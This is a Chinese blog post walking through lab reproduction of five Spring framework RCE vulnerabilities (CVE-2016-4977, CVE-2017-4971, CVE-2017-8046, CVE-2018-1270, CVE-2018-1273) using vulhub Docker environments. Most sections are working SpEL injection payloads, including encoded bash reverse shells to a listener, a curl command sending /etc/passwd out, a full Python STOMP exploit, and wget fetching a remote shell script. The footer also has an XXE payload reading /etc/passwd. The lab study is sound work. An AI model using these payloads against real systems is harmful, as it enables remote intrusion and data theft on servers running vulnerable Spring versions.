spring常见漏洞总结

最新推荐文章于 2025-04-01 15:25:21 发布
最新推荐文章于 2025-04-01 15:25:21 发布
阅读量5.4k 收藏 17
点赞数 2
文章标签: java docker 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hongduilanjun/article/details/125917069
版权

简介

Spring的英文翻译为春天,可以说是给Java程序员带来了春天,因为它极大的简化了开发。得出一个公式:Spring = 春天 = Java程序员的春天 = 简化开发。最后的简化开发正是Spring框架带来的最大好处。

Spring是一个开放源代码的设计层面框架,它是于2003 年兴起的一个轻量级的Java 开发框架。由Rod Johnson创建,其前身为Interface21框架,后改为了Spring并且正式发布。Spring是为了解决企业应用开发的复杂性而创建的。它解决的是业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用。框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为 J2EE 应用程序开发提供集成的框架。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。Spring 的理念:不去重新发明轮子。其核心是控制反转(IOC)和面向切面(AOP)。

Spring框架包含的功能大约由20个小模块组成。这些模块按组可分为核心容器(Core Container)、数据访问/集成(Data Access/Integration)、Web、面向切面编程(AOP和Aspects)、设备(Instrumentation)、消息(Messaging)和测试(Test)。如下图所示:

漏洞环境搭建

这里我为了方便,使用的是vulhub搭建docker进行漏洞复现

首先安装curl和docker

sudo apt install curl
sudo apt install docker.io

docker -v //查看是否安装成功

然后安装python和pip环境,命令如下

sudo apt install python
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
sudo python get-pip.py

pip -V //查看是否安装成功

然后再安装docker-compose

pip install docker-compose
sudo apt install docker-compose
docker-compose -v

到这个地方docker环境就已经搭建好了,这时候需要从github上把vulhub的漏洞环境给clone下来,这里直接clone网不太好,我就直接下载下来了copy到了靶机上

git clone https://github.com/vulhub/vulhub.git

下载好之后进入spring漏洞环境,这里看到有5个CVE漏洞,我们一个一个来

cve-2016-4977

Spring Security OAuth RCE(cve-2016-4977),是为Spring框架提供安全认证支持的一个模块,在7月5日其维护者发布了这样一个升级公告,主要说明在用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。漏洞的发现者在10月13日公开了该漏洞的挖掘记录

影响版本

1.0.0-1.0.5、2.0.0-2.0.9

漏洞分析

这个漏洞的触发点也是对用户传的参数的递归解析,从而导致SpEL注入,可是两者的补丁方式大不相同。Springboot的修复方法是创建一个NonRecursive类,使解析函数不进行递归。而SpringSecurityOauth的修复方法则是在前缀${前生成一个六位的字符串,只有六位字符串与之相同才会对其作为表达式进行解析。然而如果请求足够多,这种补丁也是会失效的。

这里直接查看补丁情况

可以看到在第一次执行表达式之前程序将$替换成了由RandomValueStringGenerator().generate()生成的随机字符串,也就是${errorSummary} -> random{errorSummary},但是这个替换不是递归的,所以${2334-1}并没有变。

然后创建了一个helper使程序取random{}中的内容作为表达式,这样就使得errorSummary被作为表达式执行了,而${2334-1}因为不符合random{}这个形式所以没有被当作表达式,从而也就没有办法被执行了。

不过这个Patch有一个缺点:RandomValueStringGenerator生成的字符串虽然内容随机,但长度固定为6,所以存在暴力破解的可能性。

漏洞复现

首先进入CVE-2016-4977的docker环境

访问url,输入admin/admin

http://192.168.1.10:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test

出现以下界面则存在漏洞

使用github上找到的poc对传入值进行处理

#!/usr/bin/env python
message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
 poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)

这里我传入一个whoami,返回了一个payload

将这个payload拼接到之前的网址里面访问可以发现,这里返回了一个[java.lang.UNIXProcess@f2e3e13],说明代码已经执行了

http://127.0.0.1:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))}&client_id=acme&scope=openid&redirect_uri=http://test

这里使用curl发送一个请求即可得到回显得内容

curl 192.168.1.2:5555 -d "$(cat /etc/passwd)"

这里再使用nc监听尝试反弹shell

使用到bash反弹,这里需要绕过exec()变形

bash -i >& /dev/tcp/192.168.1.2/5555 0>&1

使用http://www.jackson-t.ca/runtime-exec-payloads.html进行payload处理

将处理后的命令再放入poc.py

得到新的payload并拼接到网址里面

http://127.0.0.1:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(70)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(90)).concat(T(java.lang.Character).toString(71)).concat(T(java.lang.Character).toString(86)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(85)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(68)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(61)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))}&client_id=acme&scope=openid&redirect_uri=http://test

然后再访问这个网站即可得到反弹shell

CVE-2017-4971

Spring Web Flow框架远程代码执行(CVE-2017-4971)漏洞,是由于Spring Web Flow的数据绑定问题带来的表达式注入,从而导致任意代码执行。

影响版本

2.4.0-2.4.4、Older unsupported versions are also affected

漏洞分析

view对象处理用户事件,会根据HTTP参数绑定相应的model

如果model没有设置BinderConfiguration, 则会调用addDefaultMappings函数

进一步查看addDefaultMappings函数,可以发现输入参数以fieldMarkerPrefix(“_”)开头,则会调用addEmptyValueMapping函数

useSpringBeanBinding参数设置为false,则 expressionParser将设置为SpelExpressionParser对象的实例,而不是BeanWrapperExpressionParser对象的实例。当调用getValueType函数时,SpelExpressionParser对象将执行表达式,触发任意代码执行

漏洞复现

首先进入CVE-2017-4971的docker环境

点击登录

 

这里列出了一些登录账户,这里随便使用一个登录即可

登录之后显示如下界面

然后访问http://192.168.1.10:8080/hotels/1,点击Book Hotel

这里要把信用卡和名字都填一下,然后点击Proceed

进入如下页面,此处用bp抓包

bp抓包如下所示

这里构造一个bash反弹的payload

&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.1.2/5555 0>%261")).start()=vulhub

打开nc监听端口

把构造的payload放入抓到的包里发送

即可收到反弹shell

CVE-2017-8046

Spring-Data-REST-RCE(CVE-2017-8046),Spring Data REST对PATCH方法处理不当,导致攻击者能够利用JSON数据造成RCE。本质还是因为spring的SPEL解析导致的RCE

影响版本

Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3 Spring Boot version < 2.0.0M4 Spring Data release trains < Kay-RC3

漏洞分析

这里直接从补丁分析,从官方的描述来看就是就是Spring-data-rest服务处理PATCH请求不当,导致任意表达式执行从而导致的RCE。首先来看下补丁,主要是evaluateValueFromTarget添加了一个校验方法verifyPath,对于不合规格的path直接报异常退出,主要是property.from(pathSource,type)实现,基本逻辑就是通过反射去验证该Field是否存在于bean中

漏洞复现

进入CVE-2017-8046的docker环境

访问http://192.168.1.10:8080/customers/1返回如下界面则存在漏洞

这里先对customers/1这个页面bp抓包,还是通过bash反弹,通过处理后得到命令

bash -i >& /dev/tcp/192.168.1.2/5555 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}

因为这里执行的代码被编码为十进制位于new java.lang.String(new byte[]{xxxxxx})中,所以需要对bash命令转成十进制编码

使用python进行编码处理,在python中转十进制的方法为",".join(map(str, (map(ord,"命令"))))

",".join(map(str, (map(ord,"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}"))))

得到十进制后放入bp包里面进行构造

[
 { "op": "replace", 
   "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,117,77,105,56,49,78,84,85,49,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname",
   "value": "vulhub" 
 }
]

构造后如图所示

发包即可得到反弹shell

CVE-2018-1270

Spring Messaging 命令执行漏洞(CVE-2018-1270),Spring框架中的 spring-messaging 模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,攻击者可以通过构造恶意的消息来实现远程代码执行。

影响版本

Spring Framework 5.0 - 5.0.5 Spring Framework 4.3 - 4.3.15

漏洞分析

expressiongetValuesetValue造成的代码执行,造成这种命令执行是由Spring的SPEL表达式造成的

SPEL命令执行有两种方式,一是静态方法,二是new 对象

再看一下spring-boot-messaging实现中的代码

Expression expression = sub.getSelectorExpression();
if (expression == null) {
    result.add(sessionId, subId);
} else {
    if (context == null) {
        context = new StandardEvaluationContext(message);
        context.getPropertyAccessors().add(new DefaultSubscriptionRegistry.SimpMessageHeaderPropertyAccessor());
    }

    try {
        if (Boolean.TRUE.equals(expression.getValue(context, Boolean.class))) {
            result.add(sessionId, subId);
        }
    } catch (SpelEvaluationException var13) {
        if (this.logger.isDebugEnabled()) {
            this.logger.debug("Failed to evaluate selector: " + var13.getMessage());
        }
    } catch (Throwable var14) {
        this.logger.debug("Failed to evaluate selector", var14);
    }
}

那么一是可以利用sub.getSelectorExpression()得到selector的表达式,二是利用Boolean.TRUE.equals(expression.getValue(context, Boolean.class))获取表达式的值,从而造成命令执行

漏洞复现

进入CVE-2018-1270的docker漏洞环境

访问http://192.168.1.10:8080/gs-guide-websocket

这里直接使用前辈们写好的exp,注意修改一下bash命令和靶机地址即可

#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json
 
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
 
def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))
 
 
class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time()*1000)
 
    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)
     
    def send(self, command, headers, body=''):
        data = [command.upper(), '\n']
 
        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
         
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])
 
        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")
 
    def __del__(self):
        self.session.close()
 
 
sockjs = SockJS('http://192.168.1.10:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)
 
sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}')",
    'id': 'sub-0',
    'destination': '/topic/greetings'
})
 
data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)

首先还是bash编码

修改exp中的靶机ip和反弹命令

sockjs = SockJS('http://192.168.1.10:8080/gs-guide-websocket')

sockjs.send('subscribe', {
    'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}')",

如图所示

运行poc.py即可得到反弹shell

CVE-2018-1273

Spring Data Commons远程命令执行(CVE-2018-1273),当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容而产生漏洞

影响版本

Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) Spring Data REST 2.6 - 2.6.10 (Ingalls SR10) Spring Data Commons 2.0 to 2.0.5 (Kay SR5) Spring Data REST 3.0 - 3.0.5 (Kay SR5)

漏洞分析

这里直接看补丁进行分析,这是一个spel表达式注入漏洞。补丁的内容如下:

补丁大致就是将StandardEvaluationContext替代为SimpleEvaluationContext,由于StandardEvaluationContext权限过大,可以执行任意代码,会被恶意用户利用。

SimpleEvaluationContext的权限则小的多,只支持一些map结构,通用的jang.lang.Runtime,java.lang.ProcessBuilder都已经不再支持。

漏洞复现

首先进入CVE-2018-1273的docker环境

访问http://192.168.1.10:8080/users并用bp抓包

这里随便填一下Username跟Password

生成一个shell.sh文件

bash -i >& /dev/tcp/192.168.1.2/5555 0>&1

用python起一个http服务,并构造payload下载shell.sh文件保存在/tmp/目录下,名称为1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/usr/bin/wget -qO /tmp/1 http://192.168.1.2:8000/shell.sh")]=111&password=111&repeated=111&Password=111

nc打开端口监听再构造payload进行命令执行即可收到反弹shell

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("/bin/bash /tmp/1")]=111&password=111&repeated=111&Password=111

红队蓝军
关注
spring框架漏洞整理(Spring Boot Actuator相关漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 2119
​本文搜集了所有 spring 相关漏洞,对它们的利用条件和检测方式进行梳理和总结,希望在面对 spring 的时候能够有一个更完整的思路。这里更多是的是的利用条件和检测方式的总结,主要以发现漏洞为目的,至于如何将漏洞效果最大化这里不做过多介绍,网上资料很多,直接查对应文章即可。本文重点讲解Spring Boot Actuator相关漏洞 Spring Boot Actuator相关漏洞 主要参考文章了https://github.com/LandGrey/SpringBootVulExploit 这篇文章
Java领域Spring Cloud的安全漏洞修复与防范
最新发布
Java大师兄的博客
04-28 973
Spring Cloud作为Java领域中用于构建分布式系统的强大框架,为开发者提供了一系列丰富的功能和组件。然而,随着其广泛应用,安全问题也逐渐凸显。本文的目的在于系统地研究Spring Cloud可能存在的安全漏洞,介绍修复这些漏洞的具体方法,并给出相应的防范措施,以帮助开发者构建安全可靠的Spring Cloud应用。本文的范围涵盖了Spring Cloud常见的安全漏洞类型,如远程代码执行、SQL注入、跨站脚本攻击等,以及针对这些漏洞的修复和防范方案。
Spring框架常见漏洞
本散修的一些学习心得与笔记,道友请自便。
09-17 1367
本篇文章主要是内容常见Spring漏洞的解析以及理解。
【网络安全】Spring框架漏洞总结(一)
kali_Ma的博客
09-10 2772
Spring简介 SpringJava EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架。框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL (Spring Expr
JavaSpringBoot漏洞利用姿势合集总结详细版,从零基础到精通,收藏这篇就够了!
Libra1313的博客
04-01 1424
Spring 框架,江湖人称 Java 界的瑞士军刀,功能那是相当强大,目标是提供一个高效且可扩展的开发环境。。,提供了依赖注入(IoC)、面向切面编程(AOP)、数据访问和事务管理等神兵利器。Spring MVC。DispatcherServlet、注解驱动、视图解析,三大特性让你轻松驾驭 Web 开发。,基于 Spring Framework,自动配置、内嵌服务器、快速启动,让你告别繁琐配置。自动配置、内嵌 Tomcat、独立运行、Starter 依赖,四大金刚护体。
Spring 漏洞分析
weixin_30576859的博客
09-23 518
http://drops.wooyun.org/tips/2892 Spring框架问题分析 tang3·2014/09/01 11:29·来自乌云知识库 0x00 概述 Spring作为使用最为广泛的Java Web框架之一,拥有大量的用户。也由于用户量的庞大,Spring框架成为漏洞挖掘者关注的目标,在Struts漏洞狂出的如今,Spring也许正在被酝酿一场大的危机。 ...
spring漏洞合集 下
寒星的博客
05-07 5628
前言 现在的 java 开放的网站十个里面有九个是 spring 写的。网上对 spring 相关漏洞的资料很多,但是总结的文章却很少,再加上 spring 庞大的生态,每当看到 spring 相关网站的时候,脑子里虽然零零散散冒出来一堆漏洞,但是却不知道哪些符合当前环境。 因此搜集了所有 spring 相关漏洞,对它们的利用条件和检测方式进行梳理和总结,希望在面对 spring 的时候,能够有一个更完整的思路去发现漏洞。 这里更多是的是的利用条件和检测方式的总结,主要以发现漏洞为目的,至于如何将漏洞效果最
Spring框架漏洞(附修复方法)
C233333235的博客
08-07 1484
SpringJava EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架。框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。
Spring漏洞合集
LainWith的博客
12-26 2515
Spring 框架是一个功能强大的 Java 应用程序框架,旨在提供高效且可扩展的开发环境。其本身也是模块化的,应用程序可以选择所需要的模块。这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,程序员需要编写大量的代码来将记录插入到数据库中。但是通过使用Spring JDBC模块的 JDBCTemplate,我们可以将操作简化为几行代码,所以spring应用十分广泛,漏洞较为常见,必须掌握。
Spring Boot Actuator 漏洞复现合集
热门推荐
drnrrwfs的博客
06-12 1万+
Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的,这种未授权在某些情况下是可以达到RCE的效果的,所以还有有一定价值的,下面就是对这一系列漏洞复现。基本上就是参考这篇文章的做的复现:LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list (github.com)Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问,大多数时候我们使用基
Spring框架漏洞合集
小小猪的博客
08-18 8205
Spring框架漏洞合集 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要
【网络安全】Spring框架漏洞总结(二)
qq_44005305的博客
01-06 807
Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
Spring框架漏洞总结
weixin_42345596的博客
08-30 1238
Spring简介 SpringJava EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架。框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL (Spring Expr
Spring框架漏洞
weixin_68408599的博客
12-11 1674
以下框架漏洞均为Spring的框架,讲解方式为漏洞产生原因以及漏洞复现,重点是漏洞复现的具体过程。
Spring 框架相关漏洞详解合集_spring漏洞
2401_87167740的博客
09-18 2686
dump-显示线程转储(包括堆栈跟踪)/trace-显示最后几条HTTP消息(其中可能包含会话标识符)/logfile-输出日志文件的内容/shutdown-关闭应用程序/mappings-显示所有MVC控制器映射/env-提供对配置环境的访问/restart-重新启动应用程序。/test.htm?name=kxlzx&kxlzxcmd=calc //包含input的页面。inputkxlzx //什么名字都行。
spring常见漏洞(前言)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-13 698
Spring的英文翻译为春天,可以说是给Java程序员带来了春天,因为它极大的简化了开发。得出一个公式:Spring = 春天 = Java程序员的春天 = 简化开发。最后的简化开发正是Spring框架带来的最大好处。Spring是一个开放源代码的设计层面框架,它是于2003 年兴起的一个轻量级的Java 开发框架。由Rod Johnson创建,其前身为Interface21框架,后改为了Spring并且正式发布。Spring是为了解决企业应用开发的复杂性而创建的。
常见框架漏洞(三)----Spring
qq_65379983的博客
03-25 783
Sping框架常见漏洞 远程命令执行漏洞 代码执行漏洞
Spring 框架,Spring Data Commons 组件 远程代码执行漏洞
简简单单Onlinezuozuo
07-12 5834
Spring 框架,Spring Data Commons 组件 远程代码执行漏洞 2018年4月11日,阿里云云盾应急响应中心监测到Spring框架存在一系列漏洞。 1.Spring 框架 5.0-5.0.4,4.3 - 4.3.15 和更老的不被支持的版本中存在远程代码执行漏洞 允许应用通过Spring-Messaging模块搭建一个不落盘的STOMP消息中介,并在Websock...
常见的web漏洞有哪些
04-01
<think>嗯,用户让我介绍一下常见的Web漏洞,我需要先理清楚有哪些主要的类型。首先,OWASP Top 10应该是比较权威的来源,里面列出了最常见漏洞。我记得有注入攻击,比如SQL注入,还有跨站脚本攻击XSS。然后可能还有跨站请求伪造CSRF,不安全的反序列化,安全配置错误之类的。 接下来,得确保每个漏洞都解释清楚,包括原理、危害和例子。比如SQL注入,就是通过用户输入恶意SQL代码,破坏数据库查询。XSS分反射型、存储型和DOM型,可能用户需要知道它们的区别。CSRF则是诱使用户在已认证的情况下执行非预期的操作。 还有像敏感数据泄露,可能涉及传输或存储时的加密不足。XML外部实体注入(XXE)处理不当的XML解析器问题。文件上传漏洞,如果不对上传的文件做严格检查,可能导致恶意文件上传。还有组件中的已知漏洞,比如使用旧版本的库。 需要组织这些信息,结构要清晰,分点说明。每个漏洞的名称、简要描述、危害,可能的话加上例子。同时要注意用户提到的格式要求,数学表达式用$...$,但这里可能用不上太多数学符号,除非提到加密算法,比如哈希函数的碰撞$H(m) = H(m')$,但不确定是否需要。不过还是按用户要求,如果有涉及变量或技术术语需要公式的话,用正确的格式。 另外,用户希望回答真实可靠,可能需要引用OWASP作为依据,确保信息准确。还要用中文,避免使用专业术语时不够通俗。检查是否有遗漏的常见漏洞,比如服务器端请求伪造SSRF,权限管理不当,比如越权访问,还有API的安全问题,随着现代应用更多使用API,这方面可能也需要提及。 最后要总结一下防范措施,比如输入验证、输出编码、使用安全框架等。但用户主要问的是有哪些漏洞,所以重点在列举和解释,防范措施可以简要带过。需要确保每个点都简明扼要,让用户容易理解,同时结构清晰,分点分项,方便阅读。</think>常见的Web漏洞种类繁多,以下根据OWASP Top 10(2021版)分类,按危害程度和出现频率进行结构化说明: 1. **注入漏洞** - **原理**:未过滤用户输入,攻击者注入恶意代码(如SQL、OS命令) - **案例**:`SELECT * FROM users WHERE id = '$userInput'` 若`userInput`为`1' OR '1'='1`会导致SQL注入 2. **跨站脚本攻击(XSS)** - **类型**: - 反射型:恶意脚本通过URL参数注入 - 存储型:脚本持久化存储在服务器 - DOM型:完全在客户端执行 - **危害**:窃取Cookie(如`document.cookie`)、会话劫持 3. **敏感数据泄露** - **常见场景**: - 未使用HTTPS(如HTTP传输密码) - 弱加密算法(如MD5:$H(m) = \text{MD5}(m)$) - 硬编码密钥(如API密钥暴露在客户端代码) 4. **XML外部实体注入(XXE)** - **原理**:解析恶意XML时加载外部实体 - **攻击载荷**: ```xml <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data> ``` 5. **失效的访问控制** - **典型表现**: - 水平越权:访问他人数据(如`/user?id=123`改为`124`) - 垂直越权:普通用户执行管理员操作 6. **安全配置错误** - **常见问题**: - 默认账户未禁用(如admin/admin) - 暴露调试接口(如Spring Boot Actuator未授权访问) - 服务器头信息泄露(如`Server: Apache/2.4.6`) 7. **跨站请求伪造(CSRF)** - **攻击模式**:诱导用户点击恶意链接触发请求 - **防御公式**: $$ \text{CSRF Token} = \text{Random}(128bit) $$ 8. **不安全反序列化** - **风险**:通过篡改序列化数据执行任意代码 - **语言相关**:Java(`readObject()`)、Python(`pickle`模块) 9. **使用已知漏洞组件** - **典型案例**: - Log4j2漏洞(CVE-2021-44228) - Struts2远程代码执行(如S2-045) 10. **服务端请求伪造(SSRF)** - **利用场景**: ```http GET /api?url=http://internal-server:8080 HTTP/1.1 ``` 通过控制URL参数访问内网资源 **防御建议**: 1. 对所有输入进行白名单验证 2. 使用预编译语句防御SQL注入(如`PreparedStatement`) 3. 实施最小权限原则(Principle of Least Privilege) 4. 定期更新组件并扫描依赖(如OWASP Dependency-Check) 5. 启用CSP(内容安全策略)防御XSS 实际开发中需结合威胁建模(Threat Modeling)和渗透测试进行综合防护,建议参考MITRE CWE和NVD漏洞数据库获取最新安全情报。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值